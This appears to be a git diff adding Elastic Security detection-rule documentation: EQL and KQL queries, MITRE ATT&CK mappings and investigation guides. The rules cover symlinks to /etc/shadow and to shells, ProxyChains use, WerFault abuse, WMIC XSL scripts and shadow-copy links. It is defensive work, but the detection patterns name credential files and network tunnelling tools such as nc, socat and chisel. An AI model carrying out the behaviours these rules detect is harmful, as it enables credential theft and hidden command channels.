+=== Suspicious Symbolic Link Created + +Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +event.type == "start" and process.name == "ln" and process.args in ("-s", "-sf") and + ( + /* suspicious files */ + (process.args in ("/etc/shadow", "/etc/shadow-", "/etc/shadow~", "/etc/gshadow", "/etc/gshadow-") or + (process.working_directory == "/etc" and process.args in ("shadow", "shadow-", "shadow~", "gshadow", "gshadow-"))) or + + /* suspicious bins */ + (process.args in ("/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", "/bin/csh", "/bin/zsh", "/bin/ksh", "/bin/fish") or + (process.working_directory == "/bin" and process.args : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish"))) or + (process.args in ("/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh", "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish") or + (process.working_directory == "/usr/bin" and process.args in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish"))) or + + /* suspicious locations */ + (process.args : ("/etc/cron.d/*", "/etc/cron.daily/*", "/etc/cron.hourly/*", "/etc/cron.weekly/*", "/etc/cron.monthly/*")) or + (process.args : ("/home/*/.ssh/*", "/root/.ssh/*","/etc/sudoers.d/*", "/dev/shm/*")) + ) and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + not user.Ext.real.id == "0" and not group.Ext.real.id == "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc new file mode 100644 index 0000000000..f34538bfe2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc @@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable]] +=== Suspicious System Commands Executed by Previously Unknown Executable + +This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 103 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:process and event.action:(exec or exec_event or fork or fork_event) and +process.executable:( + /bin/* or /usr/bin/* or /usr/share/* or /tmp/* or /var/tmp/* or /dev/shm/* or + /etc/init.d/* or /etc/rc*.d/* or /etc/crontab or /etc/cron.*/* or /etc/update-motd.d/* or + /usr/lib/update-notifier/* or /home/*/.* or /boot/* or /srv/* or /run/*) + and process.args:(whoami or id or hostname or uptime or top or ifconfig or netstat or route or ps or pwd or ls) and + not process.name:(sudo or which or whoami or id or hostname or uptime or top or netstat or ps or pwd or ls or apt or + dpkg or yum or rpm or dnf or dockerd or docker or snapd or snap) and + not process.parent.executable:(/bin/* or /usr/bin/* or /run/k3s/* or /etc/network/* or /opt/Elastic/*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc new file mode 100644 index 0000000000..461ca7bedf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process]] +=== Suspicious Termination of ESXI Process + +Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "end" and process.name : ("vmware-vmx", "vmx") +and process.parent.name : "kill" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc new file mode 100644 index 0000000000..3368ca503d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc @@ -0,0 +1,65 @@ +[[prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains]] +=== Suspicious Utility Launched via ProxyChains + +This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "proxychains" and process.args : ( + "ssh", "sshd", "sshuttle", "socat", "iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", + "ssf", "3proxy", "ngrok", "gost", "pivotnacci", "chisel*", "nmap", "ping", "python*", "php*", "perl", "ruby", + "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "java", "telnet", "ftp", "curl", "wget") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc new file mode 100644 index 0000000000..05c24ab14e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc @@ -0,0 +1,109 @@ +[[prebuilt-rule-8-10-5-suspicious-werfault-child-process]] +=== Suspicious WerFault Child Process + +A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/ +* https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/ +* https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +* https://blog.menasec.net/2021/01/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + + process.parent.name : "WerFault.exe" and + + /* args -s and -t used to execute a process via SilentProcessExit mechanism */ + (process.parent.args : "-s" and process.parent.args : "-t" and process.parent.args : "-c") and + + not process.executable : ("?:\\Windows\\SysWOW64\\Initcrypt.exe", "?:\\Program Files (x86)\\Heimdal\\Heimdal.Guard.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..4a8995e7ed --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc @@ -0,0 +1,59 @@ +[[prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host]] +=== Suspicious Windows Process Cluster Spawned by a Host + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..72398c7a6c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc @@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process]] +=== Suspicious Windows Process Cluster Spawned by a Parent Process + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..a0267ed570 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc @@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user]] +=== Suspicious Windows Process Cluster Spawned by a User + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc new file mode 100644 index 0000000000..6a87766496 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc @@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution]] +=== Suspicious WMIC XSL Script Execution + +Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan = 2m +[process where host.os.type == "windows" and event.type == "start" and + (process.name : "WMIC.exe" or process.pe.original_file_name : "wmic.exe") and + process.args : ("format*:*", "/format*:*", "*-format*:*") and + not process.command_line : "* /format:table *"] +[any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : ("jscript.dll", "vbscript.dll") or file.name : ("jscript.dll", "vbscript.dll"))] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: XSL Script Processing +** ID: T1220 +** Reference URL: https://attack.mitre.org/techniques/T1220/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc new file mode 100644 index 0000000000..654faa8898 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc @@ -0,0 +1,136 @@ +[[prebuilt-rule-8-10-5-suspicious-zoom-child-process]] +=== Suspicious Zoom Child Process + +A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Zoom Child Process + +By examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation. + +This rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the command line of the child process to determine which commands or scripts were executed. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "Zoom.exe" and process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc new file mode 100644 index 0000000000..d3e244df1d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created]] +=== Symbolic Link to Shadow Copy Created + +Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink +* https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf +* https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/ +* https://www.hackingarticles.in/credential-dumping-ntds-dit/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Symbolic Link to Shadow Copy Created + +Shadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct 